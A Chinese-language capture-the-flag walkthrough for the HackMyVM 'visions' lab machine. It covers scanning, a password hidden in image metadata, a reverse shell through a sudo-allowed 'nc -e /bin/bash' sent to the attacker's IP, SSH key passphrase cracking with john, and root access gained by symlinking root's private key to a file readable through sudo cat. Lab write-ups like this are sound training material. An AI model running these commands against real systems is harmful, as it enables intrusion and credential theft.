当前位置:   article > 正文

HackMyvm靶机系列(3)-visions_exiftool完全入门指南 下载

exiftool完全入门指南 下载

一、信息收集

先探测网段,得到目标主机

nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox

然后进行端口扫描,发现ssh服务和http服务

nmap -sC -sV -p- 192.168.200.234

访问一下http服务,发现只有一张图片和一段注释。

这段注释看上去是一个提示,aliccia猜测可能是一个用户

使用dirsearch扫描一下目录,看看能有什么收获不

dirsearch -u http://192.168.200.234/ -e php,html,txt,bak,zip,7z,gz,db -x 404,301,500,502

然而什么东西都么有

根据它的提示,将图片下载下来,查看一下图片的元数据是啥

  1. curl http://192.168.200.234/white.png -o white.png
  2. ./exiftool white.png

如图,发现了密码

工具用法与下载:

ExifTool完全入门指南

alicia:ihaveadream

二、漏洞利用

成功登入

进来之后在当前目录下没发现flag,看了一下家目录发现有4个用户,然后在sophia目录下发现了flag,但是没有权限,运行不了。

那就先试试提权?

sudo -l

发现当前用户可以以emma用户的身份运行nc而不需要使用密码。

既然如此,那就先反弹shell试试。

kali上监听端口

然后在目标机上执行下面命语句

sudo -u emma nc 192.168.200.192 10000 -e /bin/bash

成功接受到shell,使用python获得一个交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

在当前目录下发现一个note.txt文件,内容如下。

我情不自禁???不知道啥意思。

然后我又查看了一下suid和sudo提权,都没啥突破口。

后来看了大佬的wp,发现需要使用到一些图片处理工具

StegOnline

上传图片后,点击这个箭头处。

然后就能看到用户名和密码了,这题是真的坑,信息全藏在这张图片里了

sophia:seemstobeimpossible

登录成功

当前用户可以使用任何用户的身份使用cat命令查看.invisible文件。这意味着我们使用cat命令查看该文件的时候可以用拥有root权限。

打开一看,是用户isabella的私钥欸,拿去登录试试

居然还要继续输入密码。

只能开始爆破了

可以使用john the ripper进行爆破,但是要先使用下面命令将id_rsa转换为john能识别的hash值

python3 /usr/share/john/ssh2john.py id_rsa > crack.txt

我这里使用脚本进行爆破。

rockyou.txt是kali自带的一个字典,/usr/share/wordlists/rockyou.txt.gz,使用之前需要对其解压,不然会乱码

gzip -d rockyou.txt.gz

成功爆破出密码(密码在1万多行,但是这里由于写wp我就把它放前面来了)

invisible

如图,登录成功

从下面开始,由于换了一个网络,所以这个IP变了

三、权限提升

在这里看看有没有可以用来提权的命令

然而并没有什么突破点

后来突然想起之前sophia用户使用cat命令读取.invisible文件是具有root权限的,那我能不能使用isabella用户将.invisiblla用户链接到root用户的私钥上去呢?

创建软链接

ln -sf /root/.ssh/id_rsa .invisible

读取root用户的私钥

sudo cat /home/isabella/.invisible

这里使用私钥登录是会有一个小问题,权限太高会导致登陆失败。

将权限降低,再进行登录

chmod 600 key

登录成功,获得root权限

声明:本文内容由网友自发贡献,转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
  

闽ICP备14008679号